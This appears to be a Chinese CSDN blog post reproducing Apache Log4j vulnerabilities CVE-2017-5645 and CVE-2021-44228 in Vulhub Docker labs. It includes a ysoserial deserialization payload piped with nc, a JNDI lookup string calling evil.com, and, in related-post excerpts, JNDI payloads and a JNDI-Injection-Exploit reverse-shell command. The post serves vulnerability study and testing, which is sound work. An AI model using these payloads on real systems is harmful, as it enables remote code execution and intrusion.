【vulhub】log4j

最新推荐文章于 2025-03-01 14:07:53 发布
最新推荐文章于 2025-03-01 14:07:53 发布
阅读量1.3k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: apache java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/haoaaao/article/details/124529364
版权
本文详细介绍了Apache Log4j的两个重大安全漏洞:CVE-2017-5645和CVE-2021-44228。CVE-2017-5645涉及反序列化问题,允许攻击者执行任意代码;CVE-2021-44228是JNDI注入漏洞,同样可能导致远程代码执行。文中提供了漏洞复现步骤,包括使用ysoserial生成payload并利用docker环境演示了如何利用这些漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 CVE-2017-5645(反序列化)

1、介绍

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

2、搭建

docker

3、复现

 使用ysoserial生成payload,然后发送给your-ip:4712端口

java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc ip 4712

执行docker-compose exec log4j bash进入容器,/tmp/success 已成功创建:

反弹shell

0x01 CVE-2021-44228

1、简介

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。
————————————————
https://blog.youkuaiyun.com/csdnmmd/article/details/122036527

2、搭建

 

 

3、复现

(vulhub环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞_低危表演艺术家的博客-优快云博客_vulhub更新

 

vulhublog4j
追风少年亚索的博客
11-18 1364
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4392
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
Vulhub 漏洞靶场搭建
最新发布
xnxqwzy的博客
03-01 967
Vulhub 是一个开源的漏洞靶场,旨在让漏洞复现更加简便。用户无需深入了解 Docker,执行简单的两条命令即可编译并运行一个完整的漏洞靶场镜像。Vulhub 使安全研究者能专注于漏洞本身,而不必花费过多时间在环境搭建上。官网:https://vulhub.org/(提供2024漏洞环境😊)
Vulhub——Log4j、solr
qq_55202378的博客
06-17 1422
同样需要先创建core,这次是在将。
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1355
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
log4j漏洞复现--vulhub
ccc_9wy的博客
12-08 1508
log4j漏洞复现;CVE-2021-44228 RCE漏洞;CVE-2017-5645 反序列化漏洞;JNDI;vulhub靶场;详细复现过程,带payload。
vulhub靶场log4j2漏洞复现
A2893992091的博客
09-08 402
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[ 经过 base64 编码后的命令 ]}|{base64,-d}|bash" -A [你的 vpsip]开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址。漏洞编号:CVE-2021-44228。
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 840
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
carrot11223的博客
04-29 1262
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.youkuaiyun.com/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
[~/vulhub]/log4j/CVE-2021-44228-20221225
32bin的博客
12-25 592
┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$ cat docker-compose.yml version: ‘2’ services: solr: image: vulhub/solr:8.11.0 ports:┌──(kwkl㉿kwkl)-[~/vulhub/log4j/CVE-2021-44228] └─$http://localhost:8983/solr/#/~logginghttp://localhost:8983/solr/admin/c
【vluhub】log4j注入漏洞 CVE-2021-44228
yh
07-23 1265
log4j漏洞复现,vulhub搭建
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1398
vulhub-log4j漏洞复现
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 3万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 4177
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 2061
vulhub漏洞复现练习篇
log4j-CVE-2021-44228-vulhub复现
ANYOUZHEN的博客
06-03 710
使用kali上的vulhub去打开我们输入在kali当前终端输入docker-compose up -d --build启动靶场但是启动靶场时出现了报错问题,网上搜索解决方法解决方法:给管理权限在kali终端输入:sudo docker-compose up -d 下面可以看到靶场正在启动接着输入 http://127.0.0.1:8983/solr/#/可以看到靶场成功打开Dnslog测试DNSLog Platform //dnslog平台网址我们在kali上第二个窗口打开dnslog平台进行记录,点
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 1094
log4j 反序列化、远程代码执行漏洞
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
m0_57540655的博客
04-18 1208
我第一次复现的时候,直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar,可以在github上搜一下(后文会介绍),但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞,对漏洞利用的每个步骤好像并不是很明确,所以我们还是先不用这种方法,还是老老实实自己编写一下恶意代码,启动一下恶意的http服务站点和LDAP服务,完整的演示一下过程。接下来,我们在攻击机启动LDAP服务。
记一次vulhub靶场复现Log4j CVE-2021-44228
weixin_53622191的博客
07-19 344
http://靶机ip:8983/solr/admin/cores?action = ${jndi : ldap : / / 攻击机ip : 1389 / Exploit}然后就会出现这个页面几个端口的监听情况这里可以看到靶机是已经通过这个GET请求执行了我们的Exploit.class了,并且响应200成功这边7777也已经收到了反弹的shell,并且可以执行命令至此就已经复现成功了,最后要在进入你的漏洞目录,关闭你的靶场环境哦。
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值